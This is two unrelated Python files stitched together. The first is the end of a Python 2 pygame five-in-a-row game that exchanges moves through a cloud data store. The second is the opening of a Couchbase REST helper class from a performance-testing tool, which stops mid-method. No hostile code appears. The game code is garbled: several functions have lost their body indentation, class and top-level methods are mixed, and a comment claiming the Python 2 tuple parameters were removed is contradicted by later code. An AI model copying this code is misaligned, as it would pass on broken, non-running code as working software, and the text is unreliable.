    print "clear_last_chess_prompt (", "x:", self.last_put_X, "y:", self.last_put_Y, ")"
    # Skip when the stored position is parked off-board.
    if self.last_put_X <= CHESS_BOARD_BLOCK_COUNTS and self.last_put_Y <= CHESS_BOARD_BLOCK_COUNTS and self.last_put_X >= 0 and self.last_put_Y >= 0:
        # left top bracket (horizontal then vertical strip)
        r1 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
                     self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)
        self.scr.blit(self.board_image,r1,r1)
        pg.display.update(r1)
        r2 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
                     self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)
        self.scr.blit(self.board_image,r2,r2)
        pg.display.update(r2)
        # right bottom bracket
        r3 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
                     self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8,2,8)
        self.scr.blit(self.board_image,r3,r3)
        pg.display.update(r3)
        r4 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
                     self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)
        self.scr.blit(self.board_image,r4,r4)
        pg.display.update(r4)
        # ----------------------------------------------
        # left bottom bracket
        r5 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
                     self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)
        self.scr.blit(self.board_image,r5,r5)
        pg.display.update(r5)
        r6 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left - self.chess_radius - 1,
                     self.last_put_Y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8 ,2,8)
        self.scr.blit(self.board_image,r6,r6)
        pg.display.update(r6)
        # right top bracket
        r7 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
                     self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1 ,8,2)
        self.scr.blit(self.board_image,r7,r7)
        pg.display.update(r7)
        r8 = pg.Rect(self.last_put_X*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
                     self.last_put_Y*self.block_hight + self.board_margin_top - self.chess_radius - 1 ,2,8)
        self.scr.blit(self.board_image,r8,r8)
        pg.display.update(r8)
def put_pawn(self,x,y,color):
    """Blit a chess image at board coordinate (x, y), move the red focus
    marker there, and remember the position for later erasing."""
    print ("### put chess (x: %s, y: %s)" % (x,y))
    px = x*self.block_width + self.board_margin_left - self.chess_radius
    py = y*self.block_hight + self.board_margin_top - self.chess_radius
    pg.display.update(self.scr.blit(color, (px, py)))
    self.set_last_chess_prompt(x,y)
    self.last_put_X = x
    self.last_put_Y = y
def setup_btns(self):
    """Create the on-screen buttons (currently only QUIT, placed in the
    lower part of the side panel right of the board)."""
    # Smaller button font on touch screens.
    if TOUCH_SCREEN == True:
        button_font_size = 18
    else:
        button_font_size = 22
    button_config = {
        "clicked_font_color" : (0,0,0),
        "hover_font_color" : (205,195, 0),
        'font_color' : (255,255,255),
        'font' : tools.Font.load('impact.ttf', button_font_size),
        'border_color' : (0,0,0),
        'border_hover_color' : (100,100,100),
    }
    # x where the side panel starts; button spans the remaining width.
    self.right_board_x = CHESS_BOARD_BLOCK_COUNTS*self.block_width+self.board_margin_left * 2
    btn_height = self.board_margin_top * 2
    btn_width = SCREEN_WIDTH - self.right_board_x - self.board_margin_left * 2
    btn_rect = (self.right_board_x + self.board_margin_left,
                SCREEN_HIGHT - self.board_margin_left - btn_height,
                btn_width, btn_height)
    self.btn1 = button.Button(btn_rect, (0,0,100),
                              self.quit_click, text='QUIT',
                              clicked_color=(255,255,255), hover_color=(0,0,130), **button_config)
    self.buttons = [self.btn1]
def get_competitor_name(self, game_id, role_id):
    """Blocking: poll the cloud game-metadata record "vlv_GMETA_<game_id>"
    until the opponent's name appears, also setting self.user_name as a
    side effect. Returns the competitor's name (or None if self.done is
    set before one is found)."""
    data_id = self.node.dataId("vlv_GMETA_" + game_id)
    while not self.done:
        gmeta = self.get_dataitem(self.node, data_id)
        competitor_name = ''
        if gmeta:
            data = json.loads(gmeta)
            print "### data : ", data
            # role '0' (host) waits for player2; role '1' for player1;
            # role '2' (watcher) shows player1 as "you", player2 as rival.
            if role_id == '0':
                competitor_name = data['player2']
                self.user_name = USER_NAME
            elif role_id == '1':
                competitor_name = data['player1']
                self.user_name = USER_NAME
            elif role_id == '2':
                self.user_name = data['player1']
                competitor_name = data['player2']
            # Keep polling until the opponent has actually registered.
            if not competitor_name == '':
                print "### competitor_name", competitor_name
                return competitor_name
def read_from_cloud(self):
    """Background thread body: poll the cloud move record
    "vlv_GMOVE_<game_id>" until self.done, posting each fresh move to the
    pygame event queue as a USEREVENT+1 with the move dict in `data`."""
    data_name = "vlv_GMOVE_" + str(self.game_id)
    data_id = self.node.dataId(data_name)
    old_data = ''
    while not self.done:
        try:
            data = json.loads(self.node.getData(data_id))
            # Forward only real, fresh moves (non-zero Status, changed).
            if not data['Status'] == 0 and data['Status'] and data != old_data:
                old_data = data
                try:
                    pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':data}))
                except Exception:
                    # BUG FIX: was a bare `except:`, which also swallowed
                    # SystemExit/KeyboardInterrupt; narrowed to Exception.
                    print("Fail to post event ")
                    break
        except Exception:
            # Cloud read/parse failures are expected transiently; log and retry.
            print("Fail to get data %s" % data_name)
    print("## read_from_cloud thread exit")
def findlatest_game(self):
    """Return the id of the most recently created game: the cloud keeps a
    "vlv_game_id" counter holding the NEXT id, so subtract one."""
    counter = self.node.getData(self.node.dataId("vlv_game_id"))
    return int(counter) - 1
def get_history_from_cloud(self):
    """Watching mode: download the move history of the watched game and
    replay it. If the game already ended (last Status == 2) the moves are
    replayed one-per-click (fetch_data=False); otherwise all moves are
    replayed immediately and live polling continues (fetch_data=True)."""
    self.his_data = []
    data_name = "vlv_GMOVE_" + str(self.game_id)
    data_id = self.node.dataId(data_name)
    datas = self.node.getHistoricalData(data_id, pageSize=1000)
    if len(datas) == 0:
        print "No game data"
        self.fetch_data = False
        self.done = True
        return
    # Build his_data ordered by SeqID; j tracks the highest SeqID seen.
    j = 0
    for i in range(2, len(datas)):
        print("Raw move ", datas[i]);
        # Skip records that are not valid JSON.
        try:data = json.loads(datas[i])
        except:
            continue
        if data['Status'] > 0 and data['Status']:
            print("Got " ,data['SeqID'],"move", datas[i]);
            j = data['SeqID']
            self.his_data.insert(j - 1,data)
    #Only last entry to judge if game is over
    if j == 0:
        # print "No game data"
        # No usable moves yet: keep live polling enabled.
        self.fetch_data = True
        # self.done = True
        return
    if self.his_data[j-1]['Status'] == 2:
        # Game finished (WIN status): disable live polling.
        self.fetch_data = False
    #print("Got End @ %s", str(data['SeqID']))
    self.his_data_len=j;
    #debug
    #self.fetch_data = False
    #Draw current status
    print("his data total %d,move"%self.his_data_len)
    if self.fetch_data == True:
        # Game still running: replay everything now, then poll live.
        for i in range(0, self.his_data_len):
            print('his data %s'%str(self.his_data[i]))
            pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':self.his_data[i]}))
            self.events()
    else:
        # Finished game: show the first move; later moves advance on click
        # via history_next_move().
        pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':self.his_data[0]}))
        self.his_data_move = 1
        self.events()
def history_next_move(self):
    """Replay the next recorded move in watching mode, if any remain."""
    print("history_next_move %d" %self.his_data_move)
    if self.his_data_move >= self.his_data_len:
        print("Max move")
        return
    move = self.his_data[self.his_data_move]
    pg.event.post(pg.event.Event(pg.USEREVENT+1,{'data':move}))
    self.events()
    self.his_data_move = self.his_data_move + 1
def quit_click(self):
    # QUIT button callback: flag the main loop (and worker threads that
    # watch self.done) to exit.
    self.done = True
def show_how_won(self, start_pos, end_pos):
    """Draw a red line across the winning row of chesses.

    :param start_pos: (x, y) board coordinate of the first winning chess
    :param end_pos: (x, y) board coordinate of the last winning chess

    NOTE: rewritten from the Python-2-only tuple-parameter form
    `def show_how_won(self, (x1, y1), (x2, y2))` (removed by PEP 3113);
    callers still pass two (x, y) tuples, so the interface is unchanged.
    """
    x1, y1 = start_pos
    x2, y2 = end_pos
    x1_pos = x1*self.block_width + self.board_margin_left
    y1_pos = y1*self.block_hight + self.board_margin_top
    x2_pos = x2*self.block_width + self.board_margin_left
    y2_pos = y2*self.block_hight + self.board_margin_top
    r = pg.draw.line(self.scr, RED, (x1_pos,y1_pos), (x2_pos,y2_pos), 2)
    pg.display.update(r)
def test_click(self):
    """Debug handler for the (disabled) TEST button: mark the game as won
    and draw a sample winning line from (2,2) to (6,6)."""
    self.won_game = True
    self.show_how_won((2,2), (6,6))
    print('TEST button pressed')
def easefocus(self,x,y):
    """Erase the chess-sized square at board position (x, y) by re-blitting
    the board image over it, then repair the grid lines underneath.
    Returns the dirty rect so the caller can update the display."""
    size = self.chess_radius * 2
    r = pg.Rect(x*self.block_width + self.board_margin_left - self.chess_radius,
                y*self.block_hight + self.board_margin_top - self.chess_radius,
                size, size)
    self.scr.blit(self.board_image,r,r)
    self.patch_grid(CHESS_BOARD_BLOCK_COUNTS, x, y)
    return r
    def events(self):
        """Drain the pygame event queue and dispatch each event.

        Handles: ESC/window-close quit, UI buttons, peer moves delivered
        as pg.USEREVENT+1 (including win notification), left-click play or
        history stepping, keyboard play when KEYBOARD_INPUT is enabled,
        and a hover preview on mouse motion.
        """
        for ev in pg.event.get():
            if ev.type == pg.KEYDOWN and ev.key == pg.K_ESCAPE or ev.type == pg.QUIT:
                self.done = True
                #break
            for button in self.buttons:
                button.check_event(ev)
            if ev.type == pg.USEREVENT+1:
                # Move pushed from the cloud: SeqID parity determines whose
                # turn it is; Status may signal a win.
                #print "# new user event!"
                #print "---------------ev.data[seqid]=" + str(ev.data['SeqID'])
                print "---------------ev.data" + str(ev.data)
                self.turn = ev.data['SeqID'] % 2
                self.pawn = self.turn^1
                result = ev.data['Status']
                if result == WIN:
                    # 'WinSpawns' carries the two endpoints of the winning row.
                    start_pos, end_pos = ev.data['WinSpawns']
                    #print "## start_pos:", start_pos
                    #print "## end_pos:", end_pos
                    self.show_how_won(start_pos, end_pos)
                    self.won_game = True
                if int(self.role_id) == self.pawn:
                    # The event echoes our own move; nothing to draw.
                    if result == CONTINUE:
                        pass
                    else:
                        # TODO
                        # generated error
                        # To be done
                        pass
                else: #peer draw
                    X = ev.data['PosX']
                    Y = ev.data['PosY']
                    self.seq_id = ev.data['SeqID']
                    # Odd sequence numbers are drawn with the black stone.
                    self.put_pawn(X, Y, self.black_image if self.seq_id % 2 == 1 else self.white_image)
                    if not self.role_id == "2":
                        # Players (role "1"/"0", not observers) get the turn
                        # back and record the peer's stone in the grid.
                        self.your_turn = True
                        self.grid[X][Y] = 2 if self.role_id == "1" else 1
                    #print "### 1 ### grid[X][Y]", str(self.grid[X][Y])
            # else:
            #     print ('Unhandled other USER event %s' % str(ev.data))
            elif self.fetch_data == False and ev.type == pg.MOUSEBUTTONUP and ev.button == 1:
                # Replay mode: any left click steps through move history.
                self.history_next_move()
            elif self.fetch_data == True and self.your_turn == True and ev.type == pg.MOUSEBUTTONUP and ev.button == 1 and not self.won_game == True:
                # Live play: translate the click into a grid cell and move.
                x,y = ev.pos[0]//self.block_width,ev.pos[1]//self.block_hight
                self.put_my_chess(x, y)
            #elif ev.type == pg.KEYDOWN:
            elif self.fetch_data == False and ev.type == pg.KEYDOWN and KEYBOARD_INPUT == True:
                self.history_next_move()
            elif self.fetch_data == True and ev.type == pg.KEYDOWN and KEYBOARD_INPUT == True:
                # Keyboard play: arrow keys move the cursor inside the board
                # bounds; space drops a stone at the cursor.
                print "### print key press"
                if ev.key == pg.K_SPACE:
                    print "### print space"
                    if self.your_turn == True and not self.won_game == True:
                        print "### Pressed space key ###", self.cur_x, self.cur_y
                        self.put_my_chess(self.cur_x, self.cur_y)
                elif ev.key == pg.K_DOWN:
                    print "### print down"
                    if self.your_turn == True and not self.won_game == True:
                        if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y + 1 <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y >= 0:
                            # Remember the previous cursor cell so its prompt
                            # marker can be cleared.
                            self.last_put_X = self.cur_x
                            self.last_put_Y = self.cur_y
                            self.cur_y += 1
                            self.set_last_chess_prompt(self.cur_x,self.cur_y)
                elif ev.key == pg.K_UP:
                    print "### print up"
                    if self.your_turn == True and not self.won_game == True:
                        if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y - 1 >= 0:
                            self.last_put_X = self.cur_x
                            self.last_put_Y = self.cur_y
                            self.cur_y -= 1
                            self.set_last_chess_prompt(self.cur_x,self.cur_y)
                elif ev.key == pg.K_RIGHT:
                    print "### print right"
                    if self.your_turn == True and not self.won_game == True:
                        if self.cur_x + 1 <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x >= 0 and self.cur_y >= 0:
                            self.last_put_X = self.cur_x
                            self.last_put_Y = self.cur_y
                            self.cur_x += 1
                            self.set_last_chess_prompt(self.cur_x,self.cur_y)
                elif ev.key == pg.K_LEFT:
                    print "### print left"
                    if self.your_turn == True and not self.won_game == True:
                        if self.cur_x <= CHESS_BOARD_BLOCK_COUNTS and self.cur_y <= CHESS_BOARD_BLOCK_COUNTS and self.cur_x - 1 >= 0 and self.cur_y >= 0:
                            self.last_put_X = self.cur_x
                            self.last_put_Y = self.cur_y
                            self.cur_x -= 1
                            self.set_last_chess_prompt(self.cur_x,self.cur_y)
            elif self.your_turn == True and ev.type == pg.MOUSEMOTION:
                # TODO
                #if TOUCH_SCREEN == False and self.your_turn == True:
                if SHOW_MOUSEMOTION == True:
                    # Hover preview: erase the previous ghost stone and draw
                    # one at the cell now under the cursor.
                    x,y = ev.pos[0]//self.block_width,ev.pos[1]//self.block_hight
                    if x < CHESS_BOARD_BLOCK_COUNTS + 1 and y < CHESS_BOARD_BLOCK_COUNTS + 1 and not self.won_game:
                        if self.grid[self.X][self.Y] == 0:
                            r = self.easefocus(self.X,self.Y)
                        if self.grid[x][y] == 0:
                            pg.display.update(self.scr.blit(self.white_image if self.role_id == "1" else self.black_image,
                                              (x*self.block_width+self.board_margin_left - self.chess_radius,
                                               y*self.block_hight + self.board_margin_top - self.chess_radius)))
                        self.X = x
                        self.Y = y
            #else:
            #    print "#### ev.type:", str(ev.type)
def put_my_chess(self, x, y):
if x < CHESS_BOARD_BLOCK_COUNTS + 1 and y < CHESS_BOARD_BLOCK_COUNTS + 1:
if self.grid[x][y] == 0:
self.put_pawn(x,y, self.white_image if self.role_id == "1" else self.black_image)
self.put_chess_to_cloud((x,y))
self.your_turn = False
self.grid[x][y] = 1 if self.role_id == "1" else 2
    def put_chess_to_cloud(self, (x,y)):
        # Publish the local move to the shared cloud variable so the peer
        # (and any observers) receive it as a user event.
        # NOTE: the (x,y) tuple parameter is Python 2-only syntax.
        data_name="vlv_GMOVE_" + str(self.game_id)
        data_id = self.node.dataId(data_name)
        # Every move bumps the sequence number; SeqID parity encodes which
        # side produced the move.
        self.seq_id += 1
        data_val = {'SeqID': self.seq_id, 'PosX': x, 'PosY': y, 'Status': DRAW}
        if not self.node.setData(data_id, json.dumps(data_val)):
            print("Fail to set data %s = %s" % (data_name, data_val))
        else:
            print("Data set chess pos (x:%s, y%s) to cloud" % (str(x), str(y))),
def update(self):
msg = 'Game Over'
if self.won_game:
x = self.right_board_x // 2
y = SCREEN_HIGHT // 2
if TOUCH_SCREEN == True:
msg_font_size = 50
else:
msg_font_size = 120
if self.role_id == "2":
msg = 'Got Winner!'
self.game_over, self.game_over_rect = self.make_text(msg, RED, (x,y), msg_font_size)
elif int(self.role_id) == self.pawn:
msg = 'You Win!'
self.game_over, self.game_over_rect = self.make_text(msg, RED, (x,y), msg_font_size)
else:
msg = 'You Lose!'
self.game_over, self.game_over_rect = self.make_text(msg, BLUE, (x,y), msg_font_size)
def render(self):
#self.screen.fill((255,255,255))
for button in self.buttons:
button.render(self.scr)
self.scr.blit(self.host_text, self.host_rect)
self.scr.blit(self.guest_text, self.guest_rect)
#self.scr.blit(self.games_won_text, self.games_won_rect)
#self.scr.blit(self.games_lost_text, self.games_lost_rect)
#self.scr.blit(self.sec_timelapse, self.sec_timelapse_rect)
#if self.lost_game or self.won_game():
if self.won_game:
self.scr.blit(self.overlay, (0,0))
self.scr.blit(self.game_over, self.game_over_rect)
#self.scr.blit(self.chess_cursor, self.chess_cursor_rect)
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
#self.scr.blit(self.sec_timelapse, self.sec_timelapse_rect)
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
#pg.draw.rect(self.scr, (255, 255, 255, 127), pg.Rect(0, 0, 100, 75))
def run(self):
while not self.done:
self.events()
self.update()
self.render()
pg.display.update()
#self.clock.tick(60)
def clean(self):
if self.fetch_data == True:
self.T.join(1)
pg.quit()
exit()
# Script entry point: construct the game, run the main loop, then clean up.
# NOTE(review): these run on import as well — consider wrapping in an
# `if __name__ == "__main__":` guard.
app = Game()
app.run()
app.clean()
| |
import json
import time
from collections import namedtuple
from typing import Callable, Dict, Iterator, List
import requests
from decorator import decorator
from requests.exceptions import ConnectionError
from logger import logger
from perfrunner.helpers.misc import pretty_dict
from perfrunner.settings import BucketSettings, ClusterSpec
# Retry policy for REST calls made through the @retry decorator.
MAX_RETRY = 20
RETRY_DELAY = 10  # seconds between retries on a non-2xx response
# Default ports for the Analytics and Eventing services.
ANALYTICS_PORT = 8095
EVENTING_PORT = 8096
@decorator
def retry(method: Callable, *args, **kwargs):
    """Call *method* until it returns a 2xx response.

    Connection failures sleep for twice the normal delay and retry;
    non-2xx responses log the body and URL, then retry after RETRY_DELAY.
    After MAX_RETRY attempts the run is aborted via logger.interrupt().
    """
    # Placeholder response-like object so the final failure message has a
    # .url even if every attempt raised ConnectionError.
    last = namedtuple('request', ['url'])('')
    attempts = MAX_RETRY
    while attempts:
        attempts -= 1
        try:
            last = method(*args, **kwargs)
        except ConnectionError:
            time.sleep(RETRY_DELAY * 2)
            continue
        if 200 <= last.status_code < 203:
            return last
        logger.warn(last.text)
        logger.warn('Retrying {}'.format(last.url))
        time.sleep(RETRY_DELAY)
    logger.interrupt('Request {} failed after {} attempts'.format(
        last.url, MAX_RETRY
    ))
class RestHelper:
    """Thin wrapper over the REST APIs used by perfrunner.

    Covers Couchbase Server node/cluster setup, buckets, XDCR, views,
    N1QL, GSI, FTS, Analytics, Eventing, RBAC and certificates, plus an
    Elasticsearch endpoint.  GET/POST/PUT go through the @retry
    decorator; the underscore-prefixed variants (and delete) issue a
    single, unretried request.
    """

    def __init__(self, cluster_spec: ClusterSpec):
        self.rest_username, self.rest_password = cluster_spec.rest_credentials
        # Basic-auth tuple reused by every request.
        self.auth = self.rest_username, self.rest_password
        self.cluster_spec = cluster_spec

    # ---- Low-level HTTP helpers ------------------------------------------

    @retry
    def get(self, **kwargs) -> requests.Response:
        return requests.get(auth=self.auth, **kwargs)

    def _post(self, **kwargs) -> requests.Response:
        # Single POST without retry; used where the caller inspects status.
        return requests.post(auth=self.auth, **kwargs)

    @retry
    def post(self, **kwargs) -> requests.Response:
        return self._post(**kwargs)

    def _put(self, **kwargs) -> requests.Response:
        return requests.put(auth=self.auth, **kwargs)

    @retry
    def put(self, **kwargs) -> requests.Response:
        return self._put(**kwargs)

    def _delete(self, **kwargs) -> requests.Response:
        return requests.delete(auth=self.auth, **kwargs)

    # NOTE(review): unlike get/post/put, delete is NOT retried.
    def delete(self, **kwargs) -> requests.Response:
        return self._delete(**kwargs)

    # ---- Node and cluster configuration ----------------------------------

    def set_data_path(self, host: str, path: str):
        logger.info('Configuring data path on {}'.format(host))
        api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
        data = {
            'path': path,
        }
        self.post(url=api, data=data)

    def set_index_path(self, host: str, path: str):
        logger.info('Configuring index path on {}'.format(host))
        api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
        data = {
            'index_path': path,
        }
        self.post(url=api, data=data)

    def set_analytics_paths(self, host: str, paths: List[str]):
        logger.info('Configuring analytics path on {}: {}'.format(host, paths))
        api = 'http://{}:8091/nodes/self/controller/settings'.format(host)
        data = {
            'cbas_path': paths,
        }
        self.post(url=api, data=data)

    def set_auth(self, host: str):
        logger.info('Configuring cluster authentication: {}'.format(host))
        api = 'http://{}:8091/settings/web'.format(host)
        data = {
            'username': self.rest_username, 'password': self.rest_password,
            'port': 'SAME'
        }
        self.post(url=api, data=data)

    def rename(self, host: str):
        logger.info('Changing server name: {}'.format(host))
        api = 'http://{}:8091/node/controller/rename'.format(host)
        data = {'hostname': host}
        self.post(url=api, data=data)

    # ---- Service memory quotas (all in MB) -------------------------------

    def set_mem_quota(self, host: str, mem_quota: str):
        logger.info('Configuring data RAM quota: {} MB'.format(mem_quota))
        api = 'http://{}:8091/pools/default'.format(host)
        data = {'memoryQuota': mem_quota}
        self.post(url=api, data=data)

    def set_index_mem_quota(self, host: str, mem_quota: int):
        logger.info('Configuring index RAM quota: {} MB'.format(mem_quota))
        api = 'http://{}:8091/pools/default'.format(host)
        data = {'indexMemoryQuota': mem_quota}
        self.post(url=api, data=data)

    def set_fts_index_mem_quota(self, host: str, mem_quota: int):
        logger.info('Configuring FTS RAM quota: {} MB'.format(mem_quota))
        api = 'http://{}:8091/pools/default'.format(host)
        data = {'ftsMemoryQuota': mem_quota}
        self.post(url=api, data=data)

    def set_analytics_mem_quota(self, host: str, mem_quota: int):
        logger.info('Configuring Analytics RAM quota: {} MB'.format(mem_quota))
        api = 'http://{}:8091/pools/default'.format(host)
        data = {'cbasMemoryQuota': mem_quota}
        self.post(url=api, data=data)

    def set_eventing_mem_quota(self, host: str, mem_quota: int):
        logger.info('Configuring eventing RAM quota: {} MB'.format(mem_quota))
        api = 'http://{}:8091/pools/default'.format(host)
        data = {'eventingMemoryQuota': mem_quota}
        self.post(url=api, data=data)

    # ---- Query and index settings ----------------------------------------

    def set_query_settings(self, host: str, override_settings: dict):
        # Read the current settings, apply only recognized overrides, and
        # post the merged document back.
        api = 'http://{}:8093/admin/settings'.format(host)
        settings = self.get(url=api).json()
        for override, value in override_settings.items():
            if override not in settings:
                logger.error('Cannot change query setting {} to {}, setting invalid'
                             .format(override, value))
                continue
            settings[override] = value
            logger.info('Changing {} to {}'.format(override, value))
        self.post(url=api, data=json.dumps(settings))

    def get_query_settings(self, host: str):
        api = 'http://{}:8093/admin/settings'.format(host)
        return self.get(url=api).json()

    def set_index_settings(self, host: str, settings: dict):
        # Each known option is posted individually; unknown options are
        # skipped with a warning.
        api = 'http://{}:9102/settings'.format(host)
        curr_settings = self.get_index_settings(host)
        for option, value in settings.items():
            if option in curr_settings:
                logger.info('Changing {} to {}'.format(option, value))
                self.post(url=api, data=json.dumps({option: value}))
            else:
                logger.warn('Skipping unknown option: {}'.format(option))

    def get_index_settings(self, host: str) -> dict:
        api = 'http://{}:9102/settings?internal=ok'.format(host)
        return self.get(url=api).json()

    def get_gsi_stats(self, host: str) -> dict:
        api = 'http://{}:9102/stats'.format(host)
        return self.get(url=api).json()

    def create_index(self, host: str, bucket: str, name: str, field: str,
                     storage: str = 'memdb'):
        # Creates a secondary index directly against the indexer service.
        api = 'http://{}:9102/createIndex'.format(host)
        data = {
            'index': {
                'bucket': bucket,
                'using': storage,
                'name': name,
                'secExprs': ['`{}`'.format(field)],
                'exprType': 'N1QL',
                'isPrimary': False,
                'where': '',
                'deferred': False,
                'partitionKey': '',
                'partitionScheme': 'SINGLE',
            },
            'type': 'create',
            'version': 1,
        }
        logger.info('Creating index {}'.format(pretty_dict(data)))
        self.post(url=api, data=json.dumps(data))

    # ---- Cluster membership and rebalance --------------------------------

    def set_services(self, host: str, services: str):
        logger.info('Configuring services on {}: {}'.format(host, services))
        api = 'http://{}:8091/node/controller/setupServices'.format(host)
        data = {'services': services}
        self.post(url=api, data=data)

    def add_node(self, host: str, new_host: str, services: str = None):
        logger.info('Adding new node: {}'.format(new_host))
        api = 'http://{}:8091/controller/addNode'.format(host)
        data = {
            'hostname': new_host,
            'user': self.rest_username,
            'password': self.rest_password,
            'services': services,
        }
        self.post(url=api, data=data)

    def rebalance(self, host: str, known_nodes: List[str],
                  ejected_nodes: List[str]):
        logger.info('Starting rebalance')
        api = 'http://{}:8091/controller/rebalance'.format(host)
        # The rebalance endpoint wants comma-separated OTP node names.
        known_nodes = ','.join(map(self.get_otp_node_name, known_nodes))
        ejected_nodes = ','.join(map(self.get_otp_node_name, ejected_nodes))
        data = {
            'knownNodes': known_nodes,
            'ejectedNodes': ejected_nodes
        }
        self.post(url=api, data=data)

    def get_counters(self, host: str) -> dict:
        api = 'http://{}:8091/pools/default'.format(host)
        return self.get(url=api).json()['counters']

    def is_not_balanced(self, host: str) -> int:
        # Non-zero when some started rebalance has not (yet) succeeded.
        counters = self.get_counters(host)
        return counters.get('rebalance_start') - counters.get('rebalance_success')

    def get_failover_counter(self, host: str) -> int:
        counters = self.get_counters(host)
        return counters.get('failover_node')

    def get_tasks(self, host: str) -> dict:
        api = 'http://{}:8091/pools/default/tasks'.format(host)
        return self.get(url=api).json()

    # NOTE(review): informal annotation; actually returns a 2-tuple
    # (is_running, progress).
    def get_task_status(self, host: str, task_type: str) -> [bool, float]:
        for task in self.get_tasks(host):
            if task['type'] == task_type:
                is_running = task['status'] == 'running'
                progress = task.get('progress')
                return is_running, progress
        return False, 0

    # ---- Buckets ---------------------------------------------------------

    def delete_bucket(self, host: str, name: str):
        logger.info('Deleting new bucket: {}'.format(name))
        api = 'http://{host}:8091/pools/default/buckets/{bucket}'.format(host=host, bucket=name)
        self.delete(url=api)

    def create_bucket(self,
                      host: str,
                      name: str,
                      password: str,
                      ram_quota: int,
                      replica_number: int,
                      replica_index: int,
                      eviction_policy: str,
                      bucket_type: str,
                      conflict_resolution_type: str = None,
                      compression_mode: str = None):
        logger.info('Adding new bucket: {}'.format(name))
        api = 'http://{}:8091/pools/default/buckets'.format(host)
        data = {
            'name': name,
            'bucketType': bucket_type,
            'ramQuotaMB': ram_quota,
            'evictionPolicy': eviction_policy,
            'flushEnabled': 1,
            'replicaNumber': replica_number,
            'authType': 'sasl',
            'saslPassword': password,
        }
        # replicaIndex only applies to the default (couchbase) bucket type.
        if bucket_type == BucketSettings.BUCKET_TYPE:
            data['replicaIndex'] = replica_index
        if conflict_resolution_type:
            data['conflictResolutionType'] = conflict_resolution_type
        if compression_mode:
            data['compressionMode'] = compression_mode
        logger.info('Bucket configuration: {}'.format(pretty_dict(data)))
        self.post(url=api, data=data)

    def flush_bucket(self, host: str, bucket: str):
        logger.info('Flushing bucket: {}'.format(bucket))
        api = 'http://{}:8091/pools/default/buckets/{}/controller/doFlush'.format(host, bucket)
        self.post(url=api)

    def configure_auto_compaction(self, host, settings):
        logger.info('Applying auto-compaction settings: {}'.format(settings))
        api = 'http://{}:8091/controller/setAutoCompaction'.format(host)
        data = {
            'databaseFragmentationThreshold[percentage]': settings.db_percentage,
            'viewFragmentationThreshold[percentage]': settings.view_percentage,
            'parallelDBAndViewCompaction': str(settings.parallel).lower()
        }
        self.post(url=api, data=data)

    def get_auto_compaction_settings(self, host: str) -> dict:
        api = 'http://{}:8091/settings/autoCompaction'.format(host)
        return self.get(url=api).json()

    def get_bucket_stats(self, host: str, bucket: str) -> dict:
        api = 'http://{}:8091/pools/default/buckets/{}/stats'.format(host,
                                                                     bucket)
        return self.get(url=api).json()

    # ---- XDCR ------------------------------------------------------------

    def get_xdcr_stats(self, host: str, bucket: str) -> dict:
        api = 'http://{}:8091/pools/default/buckets/@xdcr-{}/stats'.format(host,
                                                                           bucket)
        return self.get(url=api).json()

    def add_remote_cluster(self,
                           local_host: str,
                           remote_host: str,
                           name: str,
                           secure_type: str,
                           certificate: str):
        logger.info('Adding a remote cluster: {}'.format(remote_host))
        api = 'http://{}:8091/pools/default/remoteClusters'.format(local_host)
        payload = {
            'name': name,
            'hostname': remote_host,
            'username': self.rest_username,
            'password': self.rest_password,
        }
        if secure_type:
            payload['secureType'] = secure_type
        if certificate:
            # Encrypted replication requires the remote cluster certificate.
            payload['demandEncryption'] = 1
            payload['certificate'] = certificate
        self.post(url=api, data=payload)

    def get_remote_clusters(self, host: str) -> List[Dict]:
        logger.info('Getting remote clusters')
        api = 'http://{}:8091/pools/default/remoteClusters'.format(host)
        return self.get(url=api).json()

    def create_replication(self, host: str, params: dict):
        logger.info('Starting replication with parameters {}'.format(params))
        api = 'http://{}:8091/controller/createReplication'.format(host)
        self.post(url=api, data=params)

    # ---- Compaction and views --------------------------------------------

    def trigger_bucket_compaction(self, host: str, bucket: str):
        logger.info('Triggering bucket {} compaction'.format(bucket))
        api = 'http://{}:8091/pools/default/buckets/{}/controller/compactBucket'\
            .format(host, bucket)
        self.post(url=api)

    def trigger_index_compaction(self, host: str, bucket: str, ddoc: str):
        logger.info('Triggering ddoc {} compaction, bucket {}'.format(
            ddoc, bucket
        ))
        api = 'http://{}:8091/pools/default/buckets/{}/ddocs/_design%2F{}/controller/compactView'\
            .format(host, bucket, ddoc)
        self.post(url=api)

    def create_ddoc(self, host: str, bucket: str, ddoc_name: str, ddoc: dict):
        logger.info('Creating new ddoc {}, bucket {}'.format(
            ddoc_name, bucket
        ))
        api = 'http://{}:8091/couchBase/{}/_design/{}'.format(
            host, bucket, ddoc_name)
